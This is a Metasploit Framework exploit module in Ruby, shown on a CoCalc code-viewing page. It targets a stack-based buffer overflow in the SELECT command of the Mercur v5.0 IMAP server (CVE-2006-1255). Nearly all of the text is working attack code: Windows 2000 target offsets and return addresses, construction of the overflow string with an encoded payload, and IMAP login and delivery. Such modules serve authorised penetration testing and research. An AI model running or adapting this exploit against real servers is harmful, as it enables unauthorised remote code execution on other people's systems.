CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Imap

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',

14
      'Description'    => %q{

15
          Mercur v5.0 IMAP server is prone to a remotely exploitable

16
        stack-based buffer overflow vulnerability. This issue is due

17
        to a failure of the application to properly bounds check

18
        user-supplied data prior to copying it to a fixed size memory buffer.

19
        Credit to Tim Taylor for discover the vulnerability.

20
      },

21
      'Author'         => [ 'Jacopo Cervini <acaro[at]jervus.it>' ],

22
      'License'        => BSD_LICENSE,

23
      'References'     =>

24
        [

25
          [ 'CVE', '2006-1255' ],

26
          [ 'OSVDB', '23950' ],

27
          [ 'BID', '17138' ],

28
        ],

29
      'Privileged'     => true,

30
      'DefaultOptions' =>

31
        {

32
          'EXITFUNC' => 'process',

33
        },

34
      'Payload'        =>

35
        {

36
          'Space'    => 400,

37
          'BadChars' => "\x00",

38
          'StackAdjustment' => -3500,

39


40
        },

41
      'Platform'       => 'win',

42
      'Targets'        =>

43
        [

44
          ['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],

45
          ['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],

46
        ],

47
      'DefaultTarget'  => 0,

48
      'DisclosureDate' => '2006-03-17'))

49


50
  end

51


52
  def exploit

53
    sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"

54
    sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])

55
    sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)

56
    sploit << payload.encoded + rand_text_alpha_upper(453)

57


58
    info = connect_login

59


60
    if (info == true)

61
      print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)

62
      sock.put(sploit + "\r\n")

63
    else

64
      print_status("Not falling through with exploit")

65
    end

66


67
    handler

68
    disconnect

69
  end

70
end

71


72